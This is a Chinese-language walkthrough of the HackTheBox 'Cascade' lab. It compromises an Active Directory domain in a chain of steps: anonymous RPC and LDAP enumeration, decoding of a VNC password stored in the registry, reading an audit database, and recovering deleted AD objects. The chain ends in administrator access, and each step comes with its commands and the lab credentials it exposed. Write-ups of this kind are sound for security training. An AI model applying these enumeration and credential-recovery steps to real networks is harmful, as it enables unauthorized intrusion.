基本信息

端口扫描

windows服务器,没有web,开了域相关端口

135

RPC可以匿名访问,直接用rpcclient

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
rpcclient 10.10.10.182 -U ""
Enter WORKGROUP\'s password:
rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[DnsUpdateProxy] rid:[0x44f]
rpcclient $> enumdomains
name:[CASCADE] idx:[0x0]
name:[Builtin] idx:[0x0]
rpcclient $>

enum enum enum

之后就是各种enum:

1
cat raw.txt | while read line; do echo $line | cut -d' ' -f2 | cut -d':' -f2 | cut -d'[' -f2 | cut -d']' -f1;done > user.txt
1
cat user.txt | while read line; do rpcclient -U "" --no-pass -c="queryuser $line" 10.10.10.182;sleep 1;done > userinfo.txt
1
cat raw.txt | while read line; do echo $line | cut -d' ' -f1 | cut -d':' -f2 | cut -d'[' -f2 | cut -d']' -f1;done > user_name.txt

现在只有一些用户信息

389

389是ldap

1
ldapsearch -h 10.10.10.182 -p 389 -x -b "dc=cascade,dc=local" > ldap_info.txt

结果中信息非常多,仔细搜寻

1
2
3
4
5
6
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local

cascadeLegacyPwd: clk0bjVldmE= # base64 decode : rY4n5eva

现在我们得到一组账号密码:

1
r.thompson : rY4n5eva

smbclient

这个账号直接使用evil-winrm失败,smbclient可以使用:

Data\IT

下载IT目录:

这个文件有部分信息:

这个log中有一个密码信息:

这个密码如果直接按hex解的话是错的,直接搜索”VNC Install.reg password”能够找到相关资料:

1
2
3
4
5
6
7
>> fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
=> "\u0017Rk\u0006#NX\a"
>> require 'rex/proto/rfb'
=> true
>> Rex::Proto::RFB::Cipher.decrypt ["6BCF2A4B6E5ACA0F"].pack('H*'), fixedkey
=> "sT333ve2"
>>

又一组账号密码:

1
s.smith : sT333ve2

NETLOGON

NETLOGON中有两个vbs文件:

SYSVOL

把这个目录下载下来,因为Groups.xml中可能存在用户名和密码(GPP):

user flag

上一步我们已经得到了s.smith的账号密码,使用这个账号登录,得到user.txt:

1
s.smith : sT333ve2

enum more

使用s.smith账号继续进行信息搜集:

Audit$\DB

这个目录下有一个db文件,下载下来查看,是sqlite3:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
➜  ~ sqlite3 Audit.db
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
sqlite> .tables
DeletedUserAudit  Ldap              Misc
sqlite> select * from DeletedUserAudit;
6|test|Test
DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d|CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
7|deleted|deleted guy
DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef|CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
9|TempAdmin|TempAdmin
DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a|CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local
sqlite> select * from Ldap;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite> select * from misc;
sqlite>

ldap中得到信息,但直接base64解的话是乱码,直接搜这串base64能够搜到相关信息:

https://dotnetfiddle.net/2RDoWz

所以现在我们有了一组新的账号密码:

1
ArkSvc : w3lc0meFr31nd

IT\Logs\Ark AD Recycle Bin

ArkAdRecycleBin.log中存在相关信息,可以看到之前看到的TempAdmin是被ArkSvc用户删除的:

AD Object

搜索上面显示的Ark AD Recycle Bin Manager能够找到相关资料:

Active Directory Recycle Bin | Recover Deleted AD Object | AD Deleted Objects
https://blog.stealthbits.com/active-directory-object-recovery-recycle-bin/

1
Get-ADOptionalFeature -Filter *
1
Get-ADObject -ldapFilter:"(msDS-LastKnownRDN=*)" –IncludeDeletedObjects
1
Get-ADObject -Filter {DisplayName -like 'TempAdmin'} -IncludeDeletedObjects | Restore-ADObject

直接尝试恢复的话,失败:

修改过滤条件继续搜寻信息:

1
2
3
4
5
6
$changeDate = New-Object dateTime(2008,11,18,1,40,02)
Get-ADObject -Filter 'whenChanged -gt $changeDate -and isDeleted -eq $true -and -not (isRecycled -eq $true) -and name -ne "Deleted Objects"' -IncludeDeletedObjects

Get-ADObject -Filter {displayName -eq "TempAdmin"} -IncludeDeletedObjects -Properties *

cascadeLegacyPwd               YmFDVDNyMWFOMDBkbGVz

base64解码后是TempAdmin的密码

1
baCT3r1aN00dles

root flag

根据前面的邮件,TempAdmin的密码和Administrator密码相同,直接登录,得到root.txt:

参考资料